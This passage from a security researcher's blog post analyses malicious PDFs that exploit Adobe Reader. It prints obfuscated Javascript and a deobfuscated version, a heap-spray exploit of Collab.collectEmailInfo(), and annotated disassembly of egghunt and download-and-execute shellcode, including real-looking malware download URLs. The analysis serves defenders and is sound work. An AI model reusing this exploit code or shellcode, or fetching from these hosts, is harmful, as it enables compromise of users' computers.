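const withoutApp = new Function(body);
// Here `app` is a parameter, standing in for the object Acrobat provides.
const withApp = new Function("app", body);

console.log(withoutApp(), withApp({ doc: {} }));
```

Outside Acrobat the value stays at 0, the decoder picks the wrong branch, and what gets eval()'d is not the real next stage.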

 

       function X6__4k3VdJVb0Id(v__Maxj, p0_Y2T){var s___Q35hFa = arguments.callee;var a4__LfE__5a6 = 0;var Do_

YD6N_7p40_r = 512;s___Q35hFa = s___Q35hFa.toString();try {if (app) {a4__LfE__5a6 = 3;a4__LfE__5a6--;}} catch(e)

{ }var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;} else {var s4_AeGcS_Ru807 = 0;var OKD

_8Y_tjg = 0;var a_i_qruF1_u = 49;a_i_qruF1_u--;while(OKD_8Y_tjg < s___Q35hFa.length) {var hYE0g_2_q = 1;var rTb_

w_VCb55 = s___Q35hFa.charCodeAt(OKD_8Y_tjg);if (rTb_w_VCb55 >= a_i_qruF1_u && rTb_w_VCb55 <= (a_i_qruF1_u + 9))

{if (s4_AeGcS_Ru807 == 4) { s4_AeGcS_Ru807 = 0; }if (isNaN(M8I2Nb0IWaPT7[s4_AeGcS_Ru807])) { M8I2Nb0IWaPT7[s4_Ae

GcS_Ru807] = 0; }M8I2Nb0IWaPT7[s4_AeGcS_Ru807] += rTb_w_VCb55;if (M8I2Nb0IWaPT7[s4_AeGcS_Ru807] > Do_YD6N_7p40_r

) {M8I2Nb0IWaPT7[s4_AeGcS_Ru807] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807++;}OKD_8Y_tjg++;}}s4_AeGcS_Ru807 = 4;Do_YD6N

7p40_r = 256;while (s4_AeGcS_Ru807 > 0) {var OKD_8Y_tjg = s4_AeGcS_Ru807 - 1;if (M8I2Nb0IWaPT7[OKD_8Y_tjg] > Do_

YD6N_7p40_r) {M8I2Nb0IWaPT7[OKD_8Y_tjg] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807--;}var F_kH_v = 0;var eG76_l = "";var

JtRA2__j_Ae = 0;var GbFYrkx_PbnQ6f6 = 0;var J8_i60lnd = 0;var ltqGwaY;var I1_EB__2_wf = 0;while(GbFYrkx_PbnQ6f6

< p0_Y2T.length) {var c_Y4Ti = p0_Y2T.substr(GbFYrkx_PbnQ6f6, 1) + "J";var A_8_QHs1s = parseInt(c_Y4Ti, 16);if (

J8_i60lnd) {ltqGwaY += A_8_QHs1s;if (F_kH_v == 4) {F_kH_v -= 4;}var uYND0Nm = ltqGwaY;uYND0Nm = uYND0Nm - (I1_EB

__2_wf + 2) * M8I2Nb0IWaPT7[F_kH_v];if (uYND0Nm < 0) {var OF0F_A6__nLc = Math.floor(uYND0Nm / 256);uYND0Nm = uYN

D0Nm - OF0F_A6__nLc * 256;}uYND0Nm = String.fromCharCode(uYND0Nm);if (a4__LfE__5a6 == 1) {eG76_l += A_8_QHs1s;}

else if (a4__LfE__5a6 == 2) {eG76_l += uYND0Nm;} else {eG76_l += GbFYrkx_PbnQ6f6;}F_kH_v++;I1_EB__2_wf++;J8_i60l

nd = 0;} else {ltqGwaY = A_8_QHs1s * 16;J8_i60lnd = 1;}GbFYrkx_PbnQ6f6++;}eval(eG76_l);return 0;}

X6__4k3VdJVb0Id(0, "10E5E67437933DC36719A1A5A4B40DA4D8A9BBB4DF662A054BCC55EF7CB512E4914F603DD828A821C29

376A3786906F5F3D1C7FB1B98C73DC440954C8F67BAA4FF217C877A39684B01CFBE5C8F36FE309A3E5DD3D532ACC81E69E13B6A05123AA30

741E0DF8121A15D9705C7546E167C3324D8FF4D50A44245B7A9E4533E67484B643C17F54A584CC4320BEECC7C5B852A3F6C5816DA6D2C613

FF28F8BD8E2BE22DCF4A4F26284F81BBAC4CBA451041AAE6864F24E34A4C6885BE54890631A3C1D9A58CAE71C894FD047FA667F3F7D99B7C

[…]B9647DC9");

Howto Deobfuscate

Ya'know, if you wanted to…

The obfuscation in this case is just a search and replace with random variable names, so just search and replace them back to something meaningful.

  • Replace ";" with ";\n" and "}" with "}\n" to prettyprint.
  • When you see var M8I2Nb0IWaPT7 = new Array(); you can rename M8I2Nb0IWaPT7 to something more meaningful like "array1".
  • When you see eval(eG76_l); you can rename eG76_l to something like evaluated_string.
  • When you see for(var 6R_6CyPe=0;6R_6CyPe<0x_17x5;6R_6CyPe+=2){ you can say, oh hey, 6R_6CyPe is an index, and 0x_17x5 is the loop count.
  • charCodeAt(index) returns a byte
  • p0_Y2T.substr and s___Q35hFa.length tell you that p0_Y2T and s___Q35hFa are strings, so rename appropriately
  • function X6__4k3VdJVb0Id( is a function, so rename appropriately
  • while(OKD_8Y_tjg < s___Q35hFa.length){ OKD_8Y_tjg++; well, it's a good guess that OKD_8Y_tjg is a loop index.
  • Use common sense to make the Javascript legible to humans. (None of this matters if you're a machine.)

The Javascript gets a copy of itself (the blob of code being eval()'d) using arguments.callee, which it hashes into a four-byte key. I just added a…

var callee = unescape('%66%75%6e%63%74%69%6f%6e%20%58%36%5f [...] %6e%20%30%3b%7d');
of the original obfuscated code (just up to the %09 (TAB) character), and replaced arguments.callee.toString() with callee.

function decode(arg1, arg2_hex){

//var argarg = arguments.callee;

var argarg = callee; // that unescape() I mentioned

//var threethings = 0; // Original

var threethings = 2; // Who cares that app is missing?

var fivetwelve = 512;

argarg = argarg.toString();

try {

if (app) {

threethings = 3;

threethings--; // So you mean 2 then

}

} catch(e) {

}

var array1 = new Array();

if (arg1) {

array1 = arg1;

} else {

var fourthings = 0;

var index = 0;

var fourtynine = 49;

fourtynine--; // ok 48 then (it's for ASCII "0")

while(index < argarg.length) {

var hYE0g_2_q = 1; // unused

var input_byte = argarg.charCodeAt(index);

// In set of [0-9]

if (input_byte >= fourtynine && input_byte <= (fourtynine + 9)) {

if (fourthings == 4) {

fourthings = 0;

}

if (isNaN(array1[fourthings])) {

array1[fourthings] = 0;

}

array1[fourthings] += input_byte;

// keep total from getting too big

if (array1[fourthings] > fivetwelve) {

array1[fourthings] -= fivetwelve;

}

fourthings++;

} // if

index++;

} // while

} // if

print(array1); // 154,315,117,92

fourthings = 4;

fivetwelve = 256;

while (fourthings > 0) {

var index = fourthings - 1;

// keep to a byte

if (array1[index] > fivetwelve) { //256

array1[index] -= fivetwelve; //256

}

fourthings--;

} // while

var indexmod4 = 0;

var evaluated = "";

var JtRA2__j_Ae = 0; // unused

var index2 = 0;

var flag = 0;

var accumulator;

var index3 = 0;

while(index2 < arg2_hex.length) {

// var c_Y4Ti = arg2_hex.substr(index2, 1) + "J";

var c_Y4Ti = arg2_hex.substr(index2, 1) ;

var parsedint = parseInt(c_Y4Ti, 16);

if (flag) {

accumulator += parsedint;

if (indexmod4 == 4) {

indexmod4 -= 4;

}

var lotsomath = accumulator;

lotsomath = lotsomath - (index3 + 2) * array1[indexmod4];

if (lotsomath < 0) {

var mod256 = Math.floor(lotsomath / 256);

lotsomath = lotsomath - mod256 * 256;

}

if (threethings == 1) {

evaluated += parsedint; // This should never run

} else if (threethings == 2) {

evaluated += String.fromCharCode(lotsomath); // This is the only line that actually decrypts

} else {

evaluated += index2; // This should never run

}

indexmod4++;

index3++;

flag = 0;

} else {

accumulator = parsedint * 16;

flag = 1;

} // if

index2++;

} // while

eval(evaluated);

return 0;

}
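Boiled down, the decoder above is a four-entry key derived from the digits in its own source text, plus a per-byte subtraction. Here is a compact sketch of that reading of it. The function names are mine, the encrypt() inverse exists only so the sketch can be checked end to end, and the stand-in source string and payload are made up. One difference to be aware of: if the source had fewer than four digits, the original would leave key slots undefined, while this version leaves them at 0.

```javascript
// Derive the four-entry key from the ASCII digits in the decoder's source.
function deriveKey(source) {
  const key = [0, 0, 0, 0];
  let slot = 0;
  for (let i = 0; i < source.length; i++) {
    const c = source.charCodeAt(i);
    if (c >= 48 && c <= 57) {               // ASCII "0".."9"
      key[slot] += c;
      if (key[slot] > 512) key[slot] -= 512; // keep total from getting too big
      slot = (slot + 1) % 4;
    }
  }
  return key.map((k) => (k > 256 ? k - 256 : k));
}

// Decrypt: byte n has (n + 2) * key[n % 4] subtracted, wrapped into 0..255.
function decrypt(hex, key) {
  let out = "";
  for (let n = 0; n * 2 + 1 < hex.length; n++) {
    let v = parseInt(hex.slice(n * 2, n * 2 + 2), 16) - (n + 2) * key[n % 4];
    if (v < 0) v -= Math.floor(v / 256) * 256;
    out += String.fromCharCode(v);
  }
  return out;
}

// Inverse of decrypt(), written only to test the round trip.
function encrypt(text, key) {
  let hex = "";
  for (let n = 0; n < text.length; n++) {
    const v = (text.charCodeAt(n) + (n + 2) * key[n % 4]) % 256;
    hex += v.toString(16).padStart(2, "0").toUpperCase();
  }
  return hex;
}

// Stand-in "source text"; its digits are 4, 9, 5, 1, 2.
const key = deriveKey("function f(){ var a = 49; var b = 512; }");
const roundTrip = decrypt(encrypt("var x = 1;", key), key);
console.log(key, roundTrip);
```

Because the key comes from the function's own text, reformatting or renaming anything that adds or removes a digit changes the key, which is why the cleaned-up version has to keep a copy of the original source around.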

The Next Part After That

And finally, we've made it to the crunchy center of this metaphor. This does the heap spray, and exploits Collab.collectEmailInfo(). Nothing really new here.

ar I8tR_yfW_B_G_4 = new Array();var co3L10RH0e_sDj = 0;var k_IbUu = "";function w4U_ES(QnE1DcNMb, c_i4I__W){var LHE7_u = c_i4I__W.toString();var b1oTk__25tEY4 = "";for(var S8_T83_ajR = 0; S8_T83_ajR < LHE7_u.length; S8_T83_ajR++) {var ksHn4MF6Hh4cHia = parseInt(LHE7_u.substr(S8_T83_ajR, 1));if (!isNaN(ksHn4MF6Hh4cHia)) {ksHn4MF6Hh4cHia = ksHn4MF6Hh4cHia.toString(16);if (ksHn4MF6Hh4cHia.length == 1) { ksHn4MF6Hh4cHia = "0" + ksHn4MF6Hh4cHia; }else if (ksHn4MF6Hh4cHia.length != 2) { ksHn4MF6Hh4cHia = "00"; }b1oTk__25tEY4 = ksHn4MF6Hh4cHia + b1oTk__25tEY4;}}while(b1oTk__25tEY4.length < 8) { b1oTk__25tEY4 = "0" + b1oTk__25tEY4; }var k__7_H1 = QnE1DcNMb.toString(16);if (k__7_H1.length == 1) { k__7_H1 = "0" + k__7_H1; }else if (k__7_H1.length != 2) { k__7_H1 = "00"; }b1oTk__25tEY4 = "3" + k__7_H1 + "P" + b1oTk__25tEY4;return b1oTk__25tEY4;}function Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA){var A_p_p7p2__u2x = new Array("");var nd__8__O_E6 = H_O610_85G;var O86U_8;if ((O86U_8 = H_O610_85G.lastIndexOf("%u00")) != -1) {if (O86U_8 + 6 == H_O610_85G.length) {A_p_p7p2__u2x[0] = H_O610_85G.substr(O86U_8 + 4, 2);nd__8__O_E6 = H_O610_85G.substring(0, O86U_8);}}O86U_8 = 1;for (S8_T83_ajR = 0; S8_T83_ajR < G_Rp3BOccXCA.length; S8_T83_ajR++) {var aD3K_EP_v_WML61 = G_Rp3BOccXCA.charCodeAt(S8_T83_ajR).toString(16);if (aD3K_EP_v_WML61.length == 1) { aD3K_EP_v_WML61 = "0" + aD3K_EP_v_WML61; }A_p_p7p2__u2x[O86U_8] = aD3K_EP_v_WML61;O86U_8++;}S8_T83_ajR = A_p_p7p2__u2x[0].length ? 
0 : 1;A_p_p7p2__u2x[O86U_8] = "00";A_p_p7p2__u2x[O86U_8 + 1] = "00";O86U_8 += 2;if ((A_p_p7p2__u2x.length - S8_T83_ajR) % 2) {A_p_p7p2__u2x[O86U_8] = "00";}while(S8_T83_ajR < A_p_p7p2__u2x.length) {nd__8__O_E6 += "%u" + A_p_p7p2__u2x[S8_T83_ajR + 1] + A_p_p7p2__u2x[S8_T83_ajR];S8_T83_ajR += 2;}nd__8__O_E6 += "%u0000";return nd__8__O_E6;}function jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ){while (x56C0_13__c.length*2<DcG_u7V_L_s_uJ) {x56C0_13__c += x56C0_13__c;}x56C0_13__c = x56C0_13__c.substring(0,DcG_u7V_L_s_uJ/2);return x56C0_13__c;}function EU_xp43s(cF_t_wgG__usi_4, gtPWfQ6O, l6__x_1d){var h_2G_2 = 0x0c0c0c0c;var x56C0_13__c = unescape(gtPWfQ6O);var G_Rp3BOccXCA = w4U_ES(cF_t_wgG__usi_4, l6__x_1d);var m8Lnd5_UsJ1f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050& [egghunt…] %u3350%uc3c0");var H_O610_85G = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc

[shellcode…] %u3438%u3861%u3361%u3239";app.hVDwfx478 = unescape(Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA));var eY_mn_7_k_Uqk5 = 0x400000;var l825oJ_81__Ny = m8Lnd5_UsJ1f.length * 2;var DcG_u7V_L_s_uJ = eY_mn_7_k_Uqk5 - (l825oJ_81__Ny+0x38);x56C0_13__c = jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ);var qj76_s_0_PgMBT = (h_2G_2 - 0x400000)/eY_mn_7_k_Uqk5;for (var Mg_70_P__N_D = 0; Mg_70_P__N_D < qj76_s_0_PgMBT; Mg_70_P__N_D++) {I8tR_yfW_B_G_4[Mg_70_P__N_D] = x56C0_13__c + m8Lnd5_UsJ1f;}}function Ecbg_08LGeWT0(){var SgNX5d = "";for (S8_T83_ajR = 0; S8_T83_ajR < 12; S8_T83_ajR++) {SgNX5d += unescape("%u0c0c%u0c0c");}var PoLA_T6Aa7KrU1s = "";for (S8_T83_ajR = 0; S8_T83_ajR < 750; S8_T83_ajR++) {PoLA_T6Aa7KrU1s += SgNX5d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: PoLA_T6Aa7KrU1s});app.clearTimeOut(co3L10RH0e_sDj);}function I_w1ifF(o64O_1QbXw){var D__c6_R_Y_qv = co3L10RH0e_sDj;if ((o64O_1QbXw >= 8 && o64O_1QbXw < 8.11) || o64O_1QbXw < 7.1) {EU_xp43s(23, "%u0c0c%u0c0c", o64O_1QbXw);Ecbg_08LGeWT0();} if (D__c6_R_Y_qv) {app.clearTimeOut(D__c6_R_Y_qv);}}var l6__x_1d = 0;var K_U2Nj7_X_3__k = app.plugIns;for (var clWu_2 = 0; clWu_2 < K_U2Nj7_X_3__k.length; clWu_2++) {var A_x_Hr7 = K_U2Nj7_X_3__k[clWu_2].version;if (A_x_Hr7 > l6__x_1d) { l6__x_1d = A_x_Hr7; }}if (app.viewerVersion == 9.103 && l6__x_1d < 9.13) {l6__x_1d = 9.13;}app.C_1aWSr__pbK_tN = I_w1ifF;co3L10RH0e_sDj = app.setTimeOut("app.C_1aWSr__pbK_tN(" + l6__x_1d.toString() + ")", 50);

Editorial About Parsing PDFs

Congratulations! If you've made it this far, you're much further along than most PDF scanners. Most don't make it past the getAnnots() call. And, in the future, things are only going to get worse. There are thousands and thousands of object properties available from inside the Acrobat Javascript environment.

To fully parse, not only must you do everything in these:

But you must also handle error cases in the exact same way that Acrobat does. Your parser must be bug-compatible with Acrobat. And, OMG, the things you can do inside of a PDF. (Which I'll decline to say at the moment, lest I give anyone any ideas about new obfuscation techniques. Not that obfuscation poses any problems for us…)

Q: So how does FireEye parse PDFs?

A: We use Adobe Acrobat versions 7, 8, and 9 to parse and execute the file.

Oh this is telling...

ISO 32000-1:2008 specifies a digital form for representing electronic documents to enable users to exchange and view electronic documents independent of the environment in which they were created or the environment in which they are viewed or printed. It is intended for the developer of software that creates PDF files (conforming writers), software that reads existing PDF files and interprets their contents for display and interaction (conforming readers) and PDF products that read and/or write PDF files for a variety of other purposes (conforming products).

ISO 32000-1:2008 does not specify the following:

  • specific processes for converting paper or electronic documents to the PDF format;
  • specific technical design, user interface or implementation or operational details of rendering;
  • specific physical methods of storing these documents such as media and storage conditions;
  • methods for validating the conformance of PDF files or readers;
  • required computer hardware and/or operating system.

Shellcode

There are two chunks of shellcode: one is Skape's old egghunt shellcode (using the egg value 0x9050905090509050), and the other is a common URLMon download-and-WinExec() shellcode. (I've seen it in a lot of malware lately, and in a post on some Chinese message board.)
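
Before either chunk can be disassembled, the %uXXXX escapes handed to unescape() have to be turned back into raw bytes. Here is a minimal Python sketch of that step, assuming each %uXXXX is one 16-bit unit stored low byte first (as it is on x86). The function name is mine, and the sample input is the escaped tail visible at the top of this section.

```python
import re

def unescape_u_to_bytes(escaped: str) -> bytes:
    """Turn a run of %uXXXX escapes into the bytes they occupy in memory."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", escaped):
        # Each %uXXXX is one 16-bit code unit; x86 stores it low byte first.
        out += int(unit, 16).to_bytes(2, "little")
    return bytes(out)

# Escaped tail copied from the obfuscated Javascript above.
sample = "%u3438%u3861%u3361%u3239"
print(unescape_u_to_bytes(sample))  # b'84a8a392'
```

Anything that is not a %uXXXX escape is silently ignored here, which is fine for a pure shellcode string but not a faithful model of Javascript's unescape().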

Egghunt Shellcode

Just go read this: egghunt.c

 

00000000 90 nop

00000001 90 nop

00000002 90 nop

00000003 90 nop

00000004 90 nop

00000005 90 nop

00000006 EB21 jmp short 0x29

00000008 59 pop ecx

00000009 B850905090 mov eax,0x90509050

0000000E 51 push ecx

0000000F 6AFF push byte -0x1

00000011 33DB xor ebx,ebx

00000013 648923 mov [fs:ebx],esp

00000016 6A02 push byte +0x2

00000018 59 pop ecx

00000019 8BFB mov edi,ebx

0000001B F3AF repe scasd

0000001D 7507 jnz 0x26

0000001F FFE7 jmp edi

00000021 6681CBFF0F or bx,0xfff

00000026 43 inc ebx

00000027 EBED jmp short 0x16

00000029 E8DAFFFFFF call 0x8

0000002E 6A0C push byte +0xc

00000030 59 pop ecx

00000031 8B040C mov eax,[esp+ecx]

00000034 B1B8 mov cl,0xb8

00000036 83040806 add dword [eax+ecx],byte +0x6

0000003A 58 pop eax

0000003B 83C410 add esp,byte +0x10

0000003E 50 push eax

0000003F 33C0 xor eax,eax

00000041 C3 ret
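
For anyone who would rather not read the assembly, the search loop can be sketched in a few lines of Python. This is only a model under simplifying assumptions: memory is a flat readable buffer, whereas the real code appears to install an exception handler so it can skip unreadable pages. The function and variable names are mine.

```python
import struct

EGG_DWORD = 0x90509050  # value loaded into EAX in the listing

def find_egg(memory: bytes, egg_dword: int = EGG_DWORD) -> int:
    """Return the offset just past the first doubled egg, or -1 if absent."""
    egg = struct.pack("<I", egg_dword) * 2  # ECX = 2, so two dwords must match
    for offset in range(len(memory) - len(egg) + 1):  # INC EBX: try every byte address
        if memory[offset:offset + len(egg)] == egg:
            # After REPE SCASD succeeds, EDI points past the egg; JMP EDI lands here.
            return offset + len(egg)
    return -1

# Toy "heap": filler, the doubled egg, then stand-in payload bytes.
heap = b"\x0c" * 37 + struct.pack("<I", EGG_DWORD) * 2 + b"\xcc\xcc"
print(find_egg(heap))  # 45
```

Requiring the egg twice in a row is what keeps the hunter from matching its own copy of the constant.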

Download to File and Exec

I started to comment this, because I haven't actually found a marked-up version of it via Google, but I was also supposed to have had this blog post done last week, so I'll document the rest of it at a later date. There are actually two samples here, but they differ by only a few instructions, so I've noted the differences in inline comments.

 

00000000 90 nop

00000001 90 nop

00000002 90 nop

00000003 90 nop

00000004 90 nop

00000005 90 nop

00000006 90 nop

00000007 90 nop

00000008 90 nop

00000009 90 nop

0000000A E800000000 call 0xf ; Leave EIP on the stack for later

0000000F EB00 jmp short 0x11 ; i.e. the base address of this shellcode

00000011 E9FC000000 jmp 0x112 ; Get EIP again, base address of offset 0x112

00000016 5F pop edi ; EDI = EIP = The end

00000017 64A130000000 mov eax,[fs:0x30] ; PEB

0000001D 780C js 0x2b ; Check if Windows 95

0000001F 8B400C mov eax,[eax+0xc] ; PEB->Ldr (PEB_LDR_DATA)

00000022 8B701C mov esi,[eax+0x1c] ; InInitializationOrderModuleList.Flink

00000025 AD lodsd ; EAX = next entry (Flink of the first entry)

00000026 8B6808 mov ebp,[eax+0x8] ; EBP = kernel32 module base address

00000029 EB09 jmp short 0x34

0000002B 8B4034 mov eax,[eax+0x34] ; Windows 9x boilerplate

0000002E 8D407C lea eax,[eax+0x7c] ; Because everyone just copies everyone

00000031 8B683C mov ebp,[eax+0x3c] ; else's (Skape's) shellcode

00000034 8BF7 mov esi,edi ; ESI = The end, and beginning of hashes

00000036 6A04 push byte +0x4

00000038 59 pop ecx ; ECX = 0x00000004

00000039 E88F000000 call 0xcd ; find_functions

0000003E E2F9 loop 0x39

00000040 686F6E0000 push dword 0x6e6f ;

00000045 6875726C6D push dword 0x6d6c7275 ; "urlmon"

0000004A 54 push esp

0000004B FF16 call near [esi] ; loadLibraryA

0000004D 8BE8 mov ebp,eax

0000004F E879000000 call 0xcd

00000054 8BD7 mov edx,edi

00000056 47 inc edi ;

00000057 803F00 cmp byte [edi],0x0

0000005A 75FA jnz 0x56 ; End of string

0000005C 47 inc edi ; Skip null

0000005D 57 push edi ; Beginning of next string

0000005E 47 inc edi ;

0000005F 803F00 cmp byte [edi],0x0

00000062 75FA jnz 0x5e

00000064 8BEF mov ebp,edi ; EDI points to end of string

00000066 5F pop edi ; EDI Beginning of string

00000067 33C9 xor ecx,ecx

00000069 81EC04010000 sub esp,0x104 ; make 260 bytes of space

0000006F 8BDC mov ebx,esp

; This is the first instruction that these two samples diverge on:

; Only one of them has this.

; 00000071 83C30C add ebx,byte +0xc ; Leave 12 bytes of space for "regsvr32 -s "

00000071 51 push ecx ; 0

00000072 52 push edx ;

00000073 53 push ebx ; End of string

00000074 6804010000 push dword 0x104 ; 260

00000079 FF560C call near [esi+0xc] ; GetTempPathA

0000007C 5A pop edx

0000007D 59 pop ecx ;

0000007E 51 push ecx ; jump target from 0xC8

0000007F 52 push edx

00000080 8B02 mov eax,[edx]

00000082 53 push ebx ; Filename

00000083 43 inc ebx

00000084 803B00 cmp byte [ebx],0x0

00000087 75FA jnz 0x83 ; EBX points to end

00000089 817BFC2E657865 cmp dword [ebx-0x4],0x6578652e ; Ends with ".exe"?

; The other version of this shellcode uses ".dll" rather than ".exe"

; 0000008C 817BFC2E646C6C cmp dword [ebx-0x4],0x6c6c642e ; ".dll"

00000090 7503 jnz 0x95

00000092 83EB08 sub ebx,byte +0x8

00000095 8903 mov [ebx],eax ; Doesn't end with ".exe"

00000097 C743042E657865 mov dword [ebx+0x4],0x6578652e ; So append ".exe"

; Again with the DLL

; C743042E646C6C mov dword [ebx+0x4],0x6c6c642e ; ".dll"

0000009E C6430800 mov byte [ebx+0x8],0x0 ; ".exe\0"

000000A2 5B pop ebx

000000A3 8AC1 mov al,cl

000000A5 0430 add al,0x30

000000A7 884500 mov [ebp+0x0],al

000000AA 33C0 xor eax,eax

000000AC 50 push eax ; NULL lpfnCB

000000AD 50 push eax ; NULL dwReserved

000000AE 53 push ebx ; szFileName

000000AF 57 push edi ; szURL

000000B0 50 push eax ; NULL pCaller

000000B1 FF5610 call near [esi+0x10] ; URLDownloadToFileA

000000B4 83F800 cmp eax,byte +0x0 ; Download ok?

000000B7 7506 jnz 0xbf

000000B9 6A01 push byte +0x1 ; SW_SHOWNORMAL maybe?

; The alternative version executes "regsvr32 -s " rather than just a tempfile EXE name

; 83EB0C sub ebx,byte +0xc ; back up 12 bytes from beginning

; C70372656773 mov dword [ebx],0x73676572 ; "regs"

; C7430476723332 mov dword [ebx+0x4],0x32337276 ; "vr32"

; C74308202D7320 mov dword [ebx+0x8],0x20732d20 ; " -s "

000000BB 53 push ebx ; Command Line

000000BC FF5604 call near [esi+0x4] ; WinExec

000000BF 5A pop edx

000000C0 59 pop ecx

000000C1 83C204 add edx,byte +0x4

000000C4 41 inc ecx

000000C5 803A00 cmp byte [edx],0x0

000000C8 75B4 jnz 0x7e

000000CA FF5608 call near [esi+0x8] ; ExitProcess

find_functions:

000000CD 51 push ecx ; 0x00000004

000000CE 56 push esi ; The end (0x117)

000000CF 8B753C mov esi,[ebp+0x3c] ; PE header VMA

000000D2 8B742E78 mov esi,[esi+ebp+0x78] ; Export table relative offset

; This is just an alternative coding of the same instruction, X86 is full of things like this

; 8B743578 mov esi,[ebp+esi+0x78]

000000D6 03F5 add esi,ebp ; Export table VMA

000000D8 56 push esi

000000D9 8B7620 mov esi,[esi+0x20] ; Names table relative offset

000000DC 03F5 add esi,ebp ; esi = Names table VMA

000000DE 33C9 xor ecx,ecx ;

000000E0 49 dec ecx ; ecx = 0xffffffff

000000E1 41 inc ecx ; jmp from 0xF8

000000E2 AD lodsd ; eax = *esi = *Names table VMA

000000E3 03C5 add eax,ebp

000000E5 33DB xor ebx,ebx

000000E7 0FBE10 movsx edx,byte [eax] ; next character of the export name

000000EA 3AD6 cmp dl,dh ; check for NUL (end of the name string)

; Another alternative coding. This seems to imply the original source was symbolic,

; and (re)compiled/assembled to create the other version.

; 38F2 cmp dl,dh

000000EC 7408 jz 0xf6

000000EE C1CB0D ror ebx,0xd ; compute hash

000000F1 03DA add ebx,edx ; compute hash ebx = accumulator

000000F3 40 inc eax

000000F4 EBF1 jmp short 0xe7

000000F6 3B1F cmp ebx,[edi]

000000F8 75E7 jnz 0xe1

000000FA 5E pop esi

000000FB 8B5E24 mov ebx,[esi+0x24] ; Ordinals table relative offset

000000FE 03DD add ebx,ebp ; Ordinals table VMA

00000100 668B0C4B mov cx,[ebx+ecx*2] ; Extrapolate function's ordinal

00000104 8B5E1C mov ebx,[esi+0x1c] ; Address table relative offset

00000107 03DD add ebx,ebp ; Address table VMA

00000109 8B048B mov eax,[ebx+ecx*4] ; Extract the relative function offset from its ordinal

0000010C 03C5 add eax,ebp ; Function VMA

0000010E AB stosd ; *edi = eax

0000010F 5E pop esi

00000110 59 pop ecx

00000111 C3 ret

00000112 E8FFFEFFFF call 0x16 ; Get EIP *here = End of shellcode

00000117 db 8e 4e 0e ec ; [ESI+0] 0xec0e4e8e LoadLibraryA

0000011B db 98 fe 8a 0e ; [ESI+4] 0x0e8afe98 WinExec

0000011F db 7e d8 e2 73 ; [ESI+8] 0x73e2d87e ExitProcess

00000123 db 33 ca 8a 5b ; [ESI+C] 0x5b8aca33 GetTempPathA

00000127 db 36 1a 2f 70 ; [ESI+10] 0x702f1a36 URLDownloadToFileA

0000012B db 6b 74 47 6f 00 ; "ktGo" ??

;Alt: db 6c 4c 70 6f 00 ; "lLpo" ??

0000014A 68 74 74 70 3a 2f ; http:/

00000150 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 61 6e 61 6c ; /google.com.anal

00000160 79 74 69 63 73 2e 65 69 63 79 78 74 61 65 63 75 ; ytics.eicyxtaecu

00000170 6e 2e 63 6f 6d 2f 6e 74 65 2f 41 56 4f 52 50 31 ; n.com/nte/AVORP1

00000180 54 52 45 53 54 31 31 2e 70 79 2f 65 48 39 39 39 ; TREST11.py/eH999

00000190 61 34 35 35 31 56 30 31 30 30 66 30 37 30 30 30 ; a4551V0100f07000

000001a0 36 52 30 30 30 30 30 30 30 30 31 30 32 54 64 32 ; 6R00000000102Td2

000001b0 64 63 63 61 37 64 32 30 31 6c 30 34 30 39 4b 39 ; dcca7d201l0409K9

000001c0 31 61 36 38 39 34 38 33 32 30 00 00 ; 1a68948320..

00000130 db 68 74 74 70 3a 2f 2f 6c 61 72 79 6a 75 2e 69 6e ; http://laryju.in

00000140 db 66 6f 2f 63 67 69 2d 62 69 6e 2f 71 77 2f 65 48 ; fo/cgi-bin/qw/eH

00000150 db 33 66 63 37 66 34 39 65 56 30 31 30 30 66 30 36 ; 3fc7f49eV0100f06

00000160 db 30 30 30 36 52 30 30 30 30 30 30 30 30 31 30 32 ; 0006R00000000102

00000170 db 54 36 63 64 63 38 39 37 38 32 30 31 6c 30 34 30 ; T6cdc8978201l040

00000180 db 39 00 ; 9.
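
The hash that find_functions compares against (the ROR EBX,0xd / ADD EBX,EDX loop) is easy to reproduce. This is a Python sketch of that loop as I read it from the listing, checked against the annotated table at offsets 0x117 through 0x127. The helper names are mine.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name: str) -> int:
    """Hash an export name the way the ROR EBX,0xd / ADD EBX,EDX loop does."""
    acc = 0
    for byte in name.encode("ascii"):
        acc = ror32(acc, 13)
        acc = (acc + byte) & 0xFFFFFFFF
    return acc

# Hash table exactly as annotated in the listing above.
documented = {
    "LoadLibraryA": 0xEC0E4E8E,
    "WinExec": 0x0E8AFE98,
    "ExitProcess": 0x73E2D87E,
    "GetTempPathA": 0x5B8ACA33,
    "URLDownloadToFileA": 0x702F1A36,
}

for name, expected in documented.items():
    status = "match" if ror13_hash(name) == expected else "MISMATCH"
    print(f"{name:20s} {ror13_hash(name):#010x} {status}")
```

Running a list of export names from kernel32 and urlmon through ror13_hash is a quick way to label unknown dwords in similar shellcode.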

Breaking News

So, after I'd already written most of this, another PDF sample showed up, also using similar metadata tricks, but in a different way than these Neosploit samples. I suspect it's a different toolkit, as the PDF is structured differently.

[The URL will be something like http://<ip address>/bbh/pdf.php .]

This PDF is also exploiting the recent Adobe 0-day CVE-2009-4324 (and a few others for good measure).

You should all know how to read this by now.

(Unless you've skipped over this entire post to here.)

I'm using 323cd2b18026019ab8364efa96893062 for this example

The Javascript segments are referenced like this in the PDF.

9 0 obj

<</Creator (Adobe)

/Title 5 0 R

/Producer 14 0 R

/Author 51 0 R

/CreationDate (D:20080924194756)

>>

endobj

 

 

 

 

This object (the info.Author) has the exploit:

 

 

51 0 obj

<<

/Filter /FlateDecode

/Length 2630

>>

stream

Decompressed it's "lka166lka175lka16elka163lka174lka169lka16 […]


endstream

endobj
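
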